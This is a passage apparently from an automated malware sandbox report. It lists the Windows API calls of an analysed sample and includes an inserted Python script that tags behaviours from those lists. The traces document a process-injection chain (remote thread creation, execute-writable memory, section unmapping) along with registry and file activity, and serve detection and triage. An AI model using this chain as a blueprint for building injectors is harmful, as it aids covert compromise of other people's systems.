  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
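Read together, the per-function API lists from the injected module paint the whole chain: OpenProcess with 0x1F0FFF (PROCESS_ALL_ACCESS) followed by CreateRemoteThread, a subcall that suspends and resumes the target thread around VirtualProtectEx with 0x40 (PAGE_EXECUTE_READWRITE) and NtUnmapViewOfSection, an earlier GetTokenInformation pair with classes 0x14 (TokenElevation) and 0x19 (TokenIntegrityLevel) resolved to a RID via GetSidSubAuthority, and IsWow64Process on the target opened with 0x400 (PROCESS_QUERY_INFORMATION). The report's own "API ID" lines are a per-function fingerprint of exactly this kind of co-occurrence. The Python below is an added example, not code from Joe Sandbox or from the sample: it parses the report's API lines (a constructed excerpt copied from the lists above) into one record per function, folding "Part of subcall function" lines into the parent as the report does, decodes the few flag arguments the rules need, and tags each record. The tag names and the rule set are this example's, not the report's, and the classifier is deliberately limited to constants this page actually shows.

```python
import re

# Constructed excerpt: API lines copied from this report's per-function "APIs" lists,
# one block per function (the full report has a few hundred such blocks).
REPORT_EXCERPT = r"""
APIs
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
Memory Dump Source
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
Memory Dump Source
APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
Memory Dump Source
"""

# One report line: optional "Part of subcall function X:" prefix, Api.Module, optional (args), ", ref: addr"
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*?)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)")

# (API, zero-based argument index) -> names for the values this page shows. Standard Win32 values.
CONSTANTS = {
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS", 0x400: "PROCESS_QUERY_INFORMATION"},
    ("GetTokenInformation", 1): {0x14: "TokenElevation", 0x19: "TokenIntegrityLevel"},
    ("VirtualProtectEx", 3): {0x40: "PAGE_EXECUTE_READWRITE"},
    ("RegOpenKeyExA", 0): {0x80000001: "HKEY_CURRENT_USER", 0x80000003: "HKEY_USERS"},
    ("CreateFileA", 1): {0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ"},
}

def parse_records(text):
    """One list of calls per function block; every 'APIs' header starts a new block."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = CALL_RE.search(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append({"api": m["api"], "module": m["mod"], "args": args,
                            "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return records

def decode(call):
    """Symbolic names for the flag arguments CONSTANTS knows; '?' (unknown to the sandbox) is skipped."""
    names = []
    for (api, idx), table in CONSTANTS.items():
        if call["api"] != api or idx >= len(call["args"]):
            continue
        raw = call["args"][idx]
        if re.fullmatch(r"[0-9A-F]+", raw):
            names.append(table.get(int(raw, 16), raw))
    return names

def classify(record):
    """Behaviour tags from API co-occurrence inside one function block (tag names are this example's)."""
    apis = {c["api"] for c in record}
    flags = {f for c in record for f in decode(c)}
    tags = set()
    if "CreateRemoteThread" in apis and ("OpenProcess" in apis or "PROCESS_ALL_ACCESS" in flags):
        tags.add("remote-thread-injection")
    if {"SuspendThread", "ResumeThread"} <= apis:
        tags.add("thread-suspend-resume-control")
    if "TokenIntegrityLevel" in flags and "GetSidSubAuthority" in apis:
        tags.add("integrity-level-check")
    if "CreateMailslotA" in apis or any("mailslot" in a.lower() for c in record for a in c["args"]):
        tags.add("mailslot-ipc")
    if {"LoadLibraryA", "GetProcAddress", "memset"} <= apis:
        tags.add("manual-import-resolution-with-name-wipe")
    return sorted(tags)

def triage(text):
    """{address of the block's first call: tags} for every function block in the text."""
    return {rec[0]["ref"]: classify(rec) for rec in parse_records(text) if rec}

if __name__ == "__main__":
    for ref, tags in triage(REPORT_EXCERPT).items():
        print(f"{ref:08X}: {', '.join(tags) or '-'}")
```

Run over the three blocks in the excerpt this yields `002E2452: remote-thread-injection, thread-suspend-resume-control`, `002E3F6C: integrity-level-check` and `0040104F: mailslot-ipc`; feeding it the whole report gives one tagged line per function, which is a quicker way to find the injection, token and IPC code in a report this long than paging through the similarity hashes.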
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 9
  • API ID: HeapFreeStrStrI
  • String ID: pnls
  • API String ID: 4137399961-141991303
  • Opcode ID: 4aa7b909af106ac1487055971ad23c5d9ff314578936fa2f1abc21ea428e854d
  • Instruction ID: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
  • Opcode Fuzzy Hash: E6D095824D6F9B47C9517014971DE702580FF430D3D9B726405C1434515F00301F1D1D
  • Instruction Fuzzy Hash: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
APIs
    • Part of subcall function 002E47D3: memcpy.NTDLL(00000004,?,?,?,00000000), ref: 002E48C3
  • HeapFree.KERNEL32(00000000,?,?), ref: 002E14BE
    • Part of subcall function 002E3D12: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C), ref: 002E3D27
    • Part of subcall function 002E3D12: GetSystemDefaultUILanguage.KERNEL32(?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C,?,?,?,002E1800,00000000,?,002E7494), ref: 002E3D31
  • StrStrIA.SHLWAPI(00000000,002E7494), ref: 002E14A4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
